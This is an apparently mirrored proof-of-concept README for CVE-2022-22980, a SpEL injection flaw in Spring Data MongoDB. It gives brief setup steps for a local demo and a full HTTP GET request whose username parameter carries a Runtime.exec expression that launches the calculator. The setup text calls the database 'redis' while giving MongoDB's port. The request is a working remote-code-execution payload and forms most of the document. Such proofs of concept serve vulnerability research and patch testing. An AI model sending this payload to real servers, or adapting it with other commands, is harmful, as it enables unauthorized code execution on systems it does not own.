Share
## https://sploitus.com/exploit?id=30680DAA-8D25-51A3-8733-0EF37673CBAE
# spring-data-mongodb-cve-2022-22980-exp

鸡肋漏洞,只是记录。

1. 启动redis,27017端口

2. 启动项目,springboot启动在6666端口

   ![image-20220622155615142](docs/image-20220622155615142.png)

3. ![image-20220622155830238](docs/image-20220622155830238.png)

```
GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2


```

参考:

- https://github.com/li8u99/Spring-Data-Mongodb-Demo
- https://github.com/trganda/CVE-2022-22980